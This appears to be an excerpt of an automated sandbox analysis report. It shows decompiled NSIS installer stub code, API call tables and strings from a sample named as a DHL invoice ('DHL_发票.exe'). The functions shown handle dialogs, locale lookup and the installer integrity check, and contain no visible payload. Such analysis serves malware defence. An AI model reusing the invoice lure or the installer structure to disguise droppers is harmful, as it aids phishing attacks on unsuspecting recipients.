									_t58 = CreateDialogParamW( *0x4349f4,  *_t146 +  *0x4349d4 & 0x0000ffff, _t137,  *(0x40b018 +  *(_t146 + 4) * 4), _t146); // executed
									 *0x4349dc = _t58;
									if(_t58 == 0) {
										goto L63;
									}
									_push( *((intOrPtr*)(_t146 + 0x2c)));
									_push(6);
									E0040551A(_t58);
									GetWindowRect(GetDlgItem(_t137, 0x3fa), _t159 + 0x10);
									ScreenToClient(_t137, _t159 + 0x10);
									SetWindowPos( *0x4349dc, 0,  *(_t159 + 0x20),  *(_t159 + 0x20), 0, 0, 0x15);
									_push(0);
									E00401399( *((intOrPtr*)(_t146 + 0xc)));
									if( *0x4349ec != 0) {
										goto L66;
									}
									ShowWindow( *0x4349dc, 8); // executed
									E004054E8(0x405);
									goto L62;
								}
								if( *0x435acc != 0) {
									goto L66;
								}
								if( *0x435ac0 != 0) {
									continue;
								}
								goto L66;
							}
						}
						DestroyWindow( *0x4349dc);
						 *0x4349f8 = 0;
						EndDialog(_t137,  *0x42bd44);
						goto L62;
					} else {
						if(_t139 != 1) {
							L37:
							if( *_t146 == 0) {
								goto L66;
							}
							goto L38;
						}
						_push(0);
						if(E00401399( *((intOrPtr*)(_t146 + 0x10))) == 0) {
							goto L37;
						}
						SendMessageW( *0x4349dc, 0x40f, 0, 1);
						return 0 |  *0x4349ec == 0x00000000;
					}
				} else {
					if(_t143 != 0x47) {
						if(_t143 != 5) {
							if(_t143 != 0x40d) {
								if(_t143 != 0x11) {
									if(_t143 != 0x111) {
										goto L29;
									}
									_t138 = _a12;
									_t149 = _a12 & 0x0000ffff;
									_a8 = _t149;
									_t156 = GetDlgItem(_a4, _t149);
									if(_t156 == 0) {
										L16:
										if(_t149 != 1) {
											if(_t149 != 3) {
												if(_t149 != 2) {
													L28:
													SendMessageW( *0x4349dc, 0x111, _a12, _a16);
													goto L29;
												}
												if( *0x435acc == 0) {
													if(E00401533(3) != 0) {
														goto L30;
													}
													 *0x42bd44 = 1;
													L26:
													_push(0x78);
													L27:
													E00405958();
													goto L30;
												}
												E00401533(_t149);
												 *0x42bd44 = _t149;
												goto L26;
											}
											if( *0x40b014 <= 0) {
												goto L28;
											}
											_push(0xffffffff);
											goto L27;
										}
										_push(1);
										goto L27;
									}
									SendMessageW(_t156, 0xf3, 0, 0);
									if(IsWindowEnabled(_t156) == 0) {
										L66:
										return 0;
									}
									_t149 = _a8;
									goto L16;
								}
								SetWindowLongW(_t137, 0, 0);
								return 1;
							}
							DestroyWindow( *0x4349dc);
							_t58 = _a12;
							 *0x4349dc = _t58;
							L63:
							if( *0x42bd40 == 0 && _t58 != 0) {
								ShowWindow(_t137, 0xa); // executed
								 *0x42bd40 = 1;
							}
							goto L66;
						}
						_t138 = _a12;
						asm("sbb eax, eax");
						ShowWindow( *0x42dd50,  ~(_t138 - 1) & _t143);
						if(_t138 == 2 && (GetWindowLongW(_a4, 0xfffffff0) & 0x21010000) == 0x1000000) {
							ShowWindow(_a4, 4);
						}
						goto L30;
					} else {
						SetWindowPos( *0x42dd50, _t137, 0, 0, 0, 0, 0x13);
						L29:
						_t138 = _a12;
						L30:
						return E0040575B(_t143, _t138, _a16);
					}
				}
			}

0x00404f9b
0x00404fa4
0x00404fab
0x00405133
0x0040513d
0x00405145
0x00405149
0x00405154
0x00405159
0x0040515b
0x0040515d
0x00405160
0x00405165
0x00405173
0x00405180
0x00405185
0x00405187
0x00405187
0x0040518d
0x00405199
0x004051a1
0x004051df
0x004051e4
0x004051e9
0x004051e9
0x004051ef
0x004051f4
0x004051f9
0x004051fb
0x00405201
0x00405208
0x0040520b
0x00405210
0x00405215
0x00405215
0x00405221
0x00000000
0x00000000
0x0040522f
0x00405235
0x0040523a
0x0040523e
0x00405243
0x00405246
0x0040524c
0x00405251
0x00405254
0x0040525a
0x0040525f
0x00405262
0x00405268
0x00405276
0x00405278
0x0040527c
0x00405286
0x0040528d
0x00405290
0x00405290
0x00405299
0x004052ad
0x004052c1
0x004052cb
0x004052d5
0x004052d9
0x004052e3
0x004052e8
0x004052e5
0x004052e5
0x004052e5
0x004052f7
0x00405308
0x00405314
0x0040532d
0x00405316
0x0040531f
0x00405325
0x00405325
0x00405333
0x00405343
0x00405348
0x0040535c
0x0040535d
0x00405368
0x0040536e
0x00405379
0x00000000
0x00405387
0x0040538b
0x004053b0
0x004053b6
0x004053be
0x00405489
0x00405489
0x00000000
0x00405489
0x004053e4
0x004053ea
0x004053f1
0x00000000
0x00000000
0x004053f7
0x004053fa
0x004053fd
0x00405414
0x00405420
0x00405439
0x0040543f
0x00405443
0x0040544e
0x00000000
0x00000000
0x00405458
0x00405463
0x00000000
0x00405463
0x00405393
0x00000000
0x00000000
0x0040539f
0x00000000
0x00000000
0x00000000
0x004053a5
0x00405379
0x00405470
0x0040547c
0x00405483
0x00000000
0x004051a3
0x004051a5
0x004051d7
0x004051d9
0x00000000
0x00000000
0x00000000
0x004051d9
0x004051a7
0x004051b2
0x00000000
0x00000000
0x004051c1
0x00000000
0x004051cf
0x00404fbd
0x00404fc0
0x00404fdf
0x00405035
0x00405054
0x0040506f
0x00000000
0x00000000
0x00405075
0x00405079
0x00405081
0x0040508b
0x0040508f
0x004050b4
0x004050b9
0x004050c1
0x004050d3
0x00405106
0x00405119
0x00000000
0x00405119
0x004050dc
0x004050f5
0x00000000
0x00000000
0x004050f7
0x004050fd
0x004050fd
0x004050ff
0x004050ff
0x00000000
0x004050ff
0x004050df
0x004050e4
0x00000000
0x004050e4
0x004050ca
0x00000000
0x00000000
0x004050cc
0x00000000
0x004050cc
0x004050bb
0x00000000
0x004050bb
0x0040509b
0x004050aa
0x004054aa
0x00000000
0x004054aa
0x004050b0
0x00000000
0x004050b0
0x0040505b
0x00000000
0x00405063
0x0040503d
0x00405043
0x00405047
0x0040548e
0x00405495
0x0040549e
0x004054a4
0x004054a4
0x00000000
0x00405495
0x00404fe1
0x00404ff0
0x00404ffb
0x00405000
0x00405028
0x00405028
0x00000000
0x00404fc2
0x00404fd1
0x0040511f
0x0040511f
0x00405123
0x00000000
0x00405129
0x00404fc0

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FD1
ShowWindow.USER32(?), ref: 00404FFB
GetWindowLongW.USER32(?,000000F0), ref: 0040500C
ShowWindow.USER32(?,00000004), ref: 00405028
GetDlgItem.USER32(?,00000001), ref: 0040514F
GetDlgItem.USER32(?,00000002), ref: 00405159
SetClassLongW.USER32(?,000000F2,?), ref: 00405173
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051C1
GetDlgItem.USER32(?,00000003), ref: 00405270
ShowWindow.USER32(00000000,?), ref: 00405299
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052AD
KiUserCallbackDispatcher.NTDLL(?), ref: 004052C1
EnableWindow.USER32(?), ref: 004052D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052F0
EnableMenuItem.USER32(00000000), ref: 004052F7
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405308
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040531F
lstrlenW.KERNEL32(Preblesses Setup: Installing,?,Preblesses Setup: Installing,00000000), ref: 00405350

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

SetWindowTextW.USER32(?,Preblesses Setup: Installing), ref: 00405368

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 004053B0
CreateDialogParamW.USER32(?,?,-00435A20), ref: 004053E4

Part of subcall function 0040551A: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534

GetDlgItem.USER32(?,000003FA), ref: 0040540D
GetWindowRect.USER32(00000000), ref: 00405414
ScreenToClient.USER32(?,?), ref: 00405420
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405439
ShowWindow.USER32(00000008,?,00000000), ref: 00405458

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

ShowWindow.USER32(?,0000000A), ref: 0040549E

Strings

Preblesses Setup: Installing, xrefs: 0040533E, 0040534B, 00405362

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Preblesses Setup: Installing
API String ID: 162979904-3179584722
Opcode ID: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction ID: ac036152562477463cd4b906f759de02b60d47e3f23a7c23d24dd845f532a47a
Opcode Fuzzy Hash: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction Fuzzy Hash: 39D19071A00A11BFDB206F61ED49A6B7BA8FB84355F00053AF506B62F1C7389851DF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3E Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405A3E() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr* _t21;
				short _t22;
				void* _t31;
				void* _t33;
				void* _t34;
				int _t35;
				int _t40;
				int _t41;
				int _t45;
				int _t59;
				short _t66;
				WCHAR* _t69;
				signed char _t73;
				signed short _t77;
				int _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				intOrPtr _t87;
				WCHAR* _t92;
				WCHAR* _t93;
				WCHAR* _t94;

				_t87 =  *0x435a10;
				_t21 = E004068E6(2);
				_t81 = 0x30;
				_t97 = _t21;
				if(_t21 == 0) {
					_t22 = 0x78;
					 *0x442002 = _t22;
					L"1033" = _t81;
					 *0x442004 = 0;
					E00406977(_t81, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42bd48, 0);
					__eflags =  *0x42bd48; // 0x50
					if(__eflags == 0) {
						E00406977(_t81, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M00409684, 0x42bd48, 0);
					}
					lstrcatW(L"1033", 0x42bd48);
				} else {
					_t77 =  *_t21(); // executed
					E0040661F(L"1033", _t77 & 0x0000ffff);
				}
				E0040597F(_t97);
				_t94 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
				 *0x435adc = 0x10000;
				 *0x435ac0 =  *0x435a0c & 0x00000020;
				if(E00406638(_t97, _t94) != 0) {
					L16:
					if(E00406638(_t106, _t94) == 0) {
						_push( *((intOrPtr*)(_t87 + 0x118)));
						_push(_t94);
						E00405EBA();
					}
					_t31 = LoadImageW( *0x4349f4, 0x67, "true", 0, 0, 0x8040); // executed
					_t82 = _t31;
					 *0x4349d8 = _t82;
					if( *((intOrPtr*)(_t87 + 0x50)) == 0xffffffff) {
						L22:
						__eflags = E00401533(0);
						if(__eflags != 0) {
							L32:
							_t33 = 2;
							return _t33;
						}
						_t34 = E0040597F(__eflags);
						__eflags =  *0x435ae0;
						if( *0x435ae0 != 0) {
							_t35 = E00405864(_t34, 0);
							__eflags = _t35;
							if(_t35 == 0) {
								E00401533("true");
								goto L20;
							}
							__eflags =  *0x4349ec;
							if( *0x4349ec == 0) {
								E00401533(2);
							}
							goto L32;
						}
						ShowWindow( *0x42dd50, 5); // executed
						_t40 = E0040619E("RichEd20"); // executed
						__eflags = _t40;
						if(_t40 == 0) {
							E0040619E("RichEd32");
						}
						_t41 = GetClassInfoW(0, L"RichEdit20W", 0x4349a0);
						__eflags = _t41;
						if(_t41 == 0) {
							GetClassInfoW(0, L"RichEdit", 0x4349a0);
							 *0x4349c4 = L"RichEdit20W";
							RegisterClassW(0x4349a0);
						}
						_t45 = DialogBoxParamW( *0x4349f4,  *0x4349d4 + 0x00000069 & 0x0000ffff, 0, E00404F92, 0); // executed
						E00403CF8(E00401533(5), "true");
						return _t45;
					} else {
						_t92 = L"_Nb";
						 *0x4349a4 = E00401000;
						 *0x4349b0 =  *0x4349f4;
						 *0x4349b4 = _t82;
						 *0x4349c4 = _t92;
						if(RegisterClassW(0x4349a0) != 0) {
							SystemParametersInfoW(0x30, 0,  &_v16, 0);
							_t59 = _v8 - _v16;
							__eflags = _t59;
							 *0x42dd50 = CreateWindowExW(0x80, _t92, 0, 0x80000000, _v16, _v12, _t59, _v4 - _v12, 0, 0,  *0x4349f4, 0);
							goto L22;
						}
						L20:
						return 0;
					}
				} else {
					_t86 =  *(_t87 + 0x48);
					_t99 = _t86;
					if(_t86 == 0) {
						goto L16;
					}
					_t83 =  *0x435a38;
					_t93 = 0x4339a0;
					E00406977( *0x435a38, _t99,  *((intOrPtr*)(_t87 + 0x44)),  *0x435a38 + _t86 * 2, _t83 +  *(_t87 + 0x4c) * 2, 0x4339a0, 0);
					_t66 =  *0x4339a0; // 0x43
					if(_t66 == 0) {
						goto L16;
					}
					_t84 = 0x22;
					if(_t66 == _t84) {
						_t93 = 0x4339a2;
						 *((short*)(E004065F6(0x4339a2, _t84))) = 0;
					}
					_t69 =  &(_t93[lstrlenW(_t93) + 0xfffffffc]);
					if(_t69 <= _t93 || lstrcmpiW(_t69, L".exe") != 0) {
						L15:
						E00406B1A(_t94, E00406556(_t93));
						goto L16;
					} else {
						_t73 = GetFileAttributesW(_t93);
						if(_t73 == 0xffffffff) {
							L14:
							E00406D10(_t93);
							goto L15;
						}
						_t106 = _t73 & 0x00000010;
						if((_t73 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00405a45
0x00405a4d
0x00405a56
0x00405a57
0x00405a59
0x00405a6f
0x00405a76
0x00405a85
0x00405a91
0x00405a97
0x00405a9c
0x00405aa3
0x00405ab6
0x00405ab6
0x00405ac1
0x00405a5b
0x00405a5b
0x00405a66
0x00405a66
0x00405ac6
0x00405ad0
0x00405ad8
0x00405ae3
0x00405aef
0x00405b87
0x00405b8f
0x00405b91
0x00405b97
0x00405b98
0x00405b98
0x00405bae
0x00405bb4
0x00405bbb
0x00405bcb
0x00405c4a
0x00405c50
0x00405c52
0x00405d04
0x00405d06
0x00000000
0x00405d06
0x00405c58
0x00405c5d
0x00405c63
0x00405cec
0x00405cf1
0x00405cf3
0x00405d11
0x00000000
0x00405d11
0x00405cf5
0x00405cfb
0x00405cff
0x00405cff
0x00000000
0x00405cfb
0x00405c71
0x00405c7c
0x00405c81
0x00405c83
0x00405c8a
0x00405c8a
0x00405c9c
0x00405c9e
0x00405ca0
0x00405ca9
0x00405cac
0x00405cb6
0x00405cb6
0x00405cd1
0x00405ce2
0x00000000
0x00405bcd
0x00405bd2
0x00405bd8
0x00405be2
0x00405be7
0x00405bed
0x00405bf8
0x00405c0a
0x00405c26
0x00405c26
0x00405c45
0x00000000
0x00405c45
0x00405bfa
0x00000000
0x00405bfa
0x00405af5
0x00405af5
0x00405af8
0x00405afa
0x00000000
0x00000000
0x00405b00
0x00405b06
0x00405b1b
0x00405b20
0x00405b29
0x00000000
0x00000000
0x00405b2d
0x00405b31
0x00405b34
0x00405b41
0x00405b41
0x00405b4d
0x00405b52
0x00405b7a
0x00405b82
0x00000000
0x00405b64
0x00405b65
0x00405b6e
0x00405b74
0x00405b75
0x00000000
0x00405b75
0x00405b70
0x00405b72
0x00000000
0x00000000
0x00000000
0x00405b72
0x00405b52

APIs

Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910

GetUserDefaultUILanguage.KERNELBASE(00000002,00000000,76383420,00000000,76383170), ref: 00405A5B

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

lstrcatW.KERNEL32(1033,Preblesses Setup: Installing), ref: 00405AC1
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Preblesses Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Preblesses Setup: Installing,00000000,00000002,00000000), ref: 00405B45
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\mnstring,1033,Preblesses Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Preblesses Setup: Installing,00000000), ref: 00405B5A
GetFileAttributesW.KERNEL32(Call), ref: 00405B65
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\mnstring), ref: 00405BAE
RegisterClassW.USER32(004349A0), ref: 00405BF3
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C0A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C3F
ShowWindow.USER32(00000005,00000000), ref: 00405C71
GetClassInfoW.USER32(00000000,RichEdit20W,004349A0), ref: 00405C9C
GetClassInfoW.USER32(00000000,RichEdit,004349A0), ref: 00405CA9
RegisterClassW.USER32(004349A0), ref: 00405CB6
DialogBoxParamW.USER32(?,00000000,00404F92,00000000), ref: 00405CD1

Strings

1033, xrefs: 00405A61, 00405A85, 00405ABC
.DEFAULT\Control Panel\International, xrefs: 00405AAC
.exe, xrefs: 00405B54
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 00405AD0, 00405AE2, 00405B81, 00405B87, 00405B97
RichEd20, xrefs: 00405C77
RichEdit, xrefs: 00405CA3
Call, xrefs: 00405B06, 00405B0F, 00405B20, 00405B74, 00405B7A
_Nb, xrefs: 00405BD2, 00405C39
Control Panel\Desktop\ResourceLocale, xrefs: 00405A7E
RichEdit20W, xrefs: 00405C96, 00405CAC
Preblesses Setup: Installing, xrefs: 00405A71, 00405A7C, 00405A9C, 00405AA6, 00405ABB
RichEd32, xrefs: 00405C85

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\mnstring$Call$Control Panel\Desktop\ResourceLocale$Preblesses Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1626897258
Opcode ID: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
Instruction ID: 6fb6b78dff8dcbba7a007941f02a836e4a1cfbcf653c0408c2f56a309db5e394
Opcode Fuzzy Hash: a27ea127888db64f7d6294d20d6e234172cb57f21fc50ad571c48084d45d65b5
Instruction Fuzzy Hash: 7061E4B1201605BEE610AB75AD45F7B36ACEF80358F50453BF901B61E2DB79AC108F6D

Uniqueness

Uniqueness Score: -1.00%

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004033ED(void* __eflags, signed int _a4) {
				char _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				long _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				long _t35;
				void* _t45;
				intOrPtr* _t49;
				long _t50;
				void* _t56;
				intOrPtr _t64;
				struct HINSTANCE__* _t70;
				signed int _t72;
				void* _t73;
				void* _t76;
				intOrPtr _t78;
				long _t80;
				long _t83;
				long _t86;
				void* _t87;
				void* _t88;

				_t80 = 0;
				_t70 = 0;
				_v32 = 0;
				_v36 = 0;
				_t35 = GetTickCount();
				_t84 = L"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe";
				 *0x435a00 = _t35 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe", 0x400);
				_t88 = E0040691B(_t84, 0x80000000, 3);
				 *0x40b010 = _t88;
				if(_t88 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t85 = L"C:\\Users\\Arthur\\Desktop";
				E00406B1A(L"C:\\Users\\Arthur\\Desktop", _t84);
				E00406B1A(0x444000, E00406D10(_t85));
				_t86 = GetFileSize(_t88, 0);
				 *0x40d968 = _t86;
				if(_t86 == 0) {
					L21:
					E00403389("true");
					_pop(_t73);
					if( *0x435a08 == 0) {
						L32:
						return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
					}
					if(_t70 == 0) {
						L25:
						_t45 = GlobalAlloc(0x40, _v8); // executed
						_t87 = _t45;
						E00403131( *0x435a08 + 0x1c);
						if(E00403148(0xffffffff, 0, _t87, _v12) != _v28) {
							goto L32;
						}
						 *0x435a10 = _t87;
						 *0x435a0c =  *_t87;
						if((_v28 & 0x00000001) != 0) {
							 *0x435a04 =  *0x435a04 + 1;
						}
						_t76 = 8;
						_t31 = _t87 + 0x44; // 0x44
						_t49 = _t31;
						do {
							_t49 = _t49 - 8;
							 *_t49 =  *_t49 + _t87;
							_t76 = _t76 - 1;
						} while (_t76 != 0);
						_t50 = SetFilePointer(_t88, 0, 0, "true"); // executed
						 *(_t87 + 0x3c) = _t50;
						_t34 = _t87 + 4; // 0x4
						E004066B4(0x435a20, _t34, 0x40);
						return 0;
					}
					E00403131( *0x40d96c);
					_t56 = E00406948(_t73,  *0x40b010,  &_v0, 4); // executed
					if(_t56 == 0 || _t80 != _a4) {
						goto L32;
					} else {
						goto L25;
					}
				}
				_t72 = _a4;
				while(1) {
					_t82 =  !=  ? 0x8000 : 0x200;
					_t83 =  <  ? _t86 :  !=  ? 0x8000 : 0x200;
					if(E0040311B(0x417538, 0x200) == 0) {
						break;
					}
					if( *0x435a08 != 0) {
						if((_t72 & 0x00000002) == 0) {
							E00403389(0);
						}
						L17:
						if(_t86 <  *0x40d968) {
							_v44 = E00406E3C(_v32, 0x417538, _t83);
						}
						 *0x40d96c =  *0x40d96c + _t83;
						_t86 = _t86 - _t83;
						if(_t86 != 0) {
							continue;
						} else {
							L20:
							_t80 = _v32;
							_t22 =  &_v36; // 0x417538
							_t70 =  *_t22;
							goto L21;
						}
					}
					E004066B4( &_v28, 0x417538, 0x1c);
					if((_v40 & 0xfffffff0) == 0 && _v24 == 0xdeadbeef && _v12 == 0x74736e49 && _v16 == 0x74666f73 && _v20 == 0x6c6c754e) {
						_t64 =  *0x40d96c; // 0x9cd47
						_t72 = _t72 | _v28;
						_t78 = _v4;
						 *0x435a08 = _t64;
						 *0x435ae0 =  *0x435ae0 | _t72 & 0x00000002;
						if(_t78 > _t86) {
							goto L32;
						}
						if((_t72 & 0x0000000c) == 4) {
							goto L20;
						}
						_v36 = _v36 + 1;
						_t86 = _t78 - 4;
						if(0x200 > _t86) {
							_t83 = _t86;
						}
					}
					goto L17;
				}
				E00403389("true");
				goto L32;
			}

0x004033f4
0x004033f6
0x004033f8
0x004033fc
0x00403400
0x0040340b
0x00403417
0x0040341c
0x0040342f
0x00403431
0x0040343a
0x00000000
0x0040343c
0x00403447
0x0040344d
0x0040345e
0x0040346c
0x0040346e
0x00403476
0x00403572
0x00403574
0x00403580
0x00403581
0x00403640
0x00000000
0x00403640
0x00403589
0x004035ba
0x004035c0
0x004035cc
0x004035d2
0x004035ea
0x00000000
0x00000000
0x004035f1
0x004035f9
0x004035fe
0x00403600
0x00403600
0x00403608
0x00403609
0x00403609
0x0040360c
0x0040360c
0x0040360f
0x00403611
0x00403611
0x0040361b
0x00403621
0x00403624
0x0040362f
0x00000000
0x00403634
0x00403591
0x004035a3
0x004035aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004035aa
0x0040347c
0x00403480
0x00403491
0x00403496
0x004034a6
0x00000000
0x00000000
0x004034b3
0x00403537
0x0040353b
0x00403540
0x00403541
0x00403547
0x00403558
0x00403558
0x0040355c
0x00403562
0x00403564
0x00000000
0x0040356a
0x0040356a
0x0040356a
0x0040356e
0x0040356e
0x00000000
0x0040356e
0x00403564
0x004034c1
0x004034ce
0x004034f8
0x004034fd
0x00403501
0x00403505
0x0040350f
0x00403517
0x00000000
0x00000000
0x00403523
0x00000000
0x00000000
0x00403525
0x00403529
0x0040352e
0x00403530
0x00403530
0x0040352e
0x00000000
0x004034ce
0x0040363a
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403400
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,00000400,?,?,?,?,?), ref: 0040341C

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,80000000,00000003,?,?,?,?,?), ref: 00403466
GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 004035C0

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403640
Inst, xrefs: 004034DA
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033F3
Error launching installer, xrefs: 0040343C
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 00403452
8uA, xrefs: 0040356E
C:\Users\user\Desktop\DHL_#U53d1#U7968.exe, xrefs: 0040340B, 00403415, 00403429, 00403446
soft, xrefs: 004034E4
Null, xrefs: 004034EE

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
